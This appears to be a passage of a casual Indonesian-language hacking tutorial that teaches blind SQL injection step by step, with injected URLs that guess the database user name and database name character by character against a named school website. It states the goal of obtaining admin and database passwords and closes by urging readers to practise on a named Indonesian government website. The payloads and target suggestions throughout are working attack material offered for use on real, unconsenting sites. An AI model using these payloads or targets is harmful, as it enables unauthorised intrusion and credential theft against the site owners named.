www.smanti.com/berita.php?id=5 and mid(user(),1,4)=CHAR(83,77,65,65)


www.smanti.com/berita.php?id=5 and mid(user(),1,4)=CHAR(83,77,65,66)


www.smanti.com/berita.php?id=5 and mid(user(),1,4)=CHAR(83,77,65,67)

ternyata ktemu di value 78..

www.smanti.com/berita.php?id=5 and mid(user(),1,4)=CHAR(83,77,65,78)

lanjut trus aja...

cape gw..


pokoknya..setelah dapet smua..kita convert char yang tadi di ke ascii table

www.piclist.com/techref/ascii.htm

stelah d convert,ternyata 83 77 65 78 tuh d ascii adalah SMAN

nah udah hampir ktebak user name nya..kerjain ndiri y..okey

nah..gmana kalo mw dapet password na?

kita rubah value
user() menjadi database() dan ulangi tahap2 diatas hingga mendapat semua value yang true..

jadi


www.smanti.com/berita.php?id=5 and mid(database(),1,1)=CHAR(65)

cari lagi..sama kayak cari user tadi..harus sabar..

ulangi sampai dapat true ..

tambain value na..wkwkwkw..

dan rubah value database() untuk mencari value lainnya..

hingga mendapat admin password dan db password
.
metode blind sql injection seperti ini membutuhkan kesabaran dan ketelitian attacker untuk mendapatkan value yg tepat..(true)

akan tetapi metode ini hingga sekarang cukup efektif untuk web yang telah menfilter celah sql injection...hehehe...

okey sampe sini aja ah..cape ngetik..wkwkwkw

slamat mencoba..


buat latihan>> www.dkp.go.id/content.php?c=5161 (ingat woi, web negara inii wkwkwk)

Smoga Bermanfaat..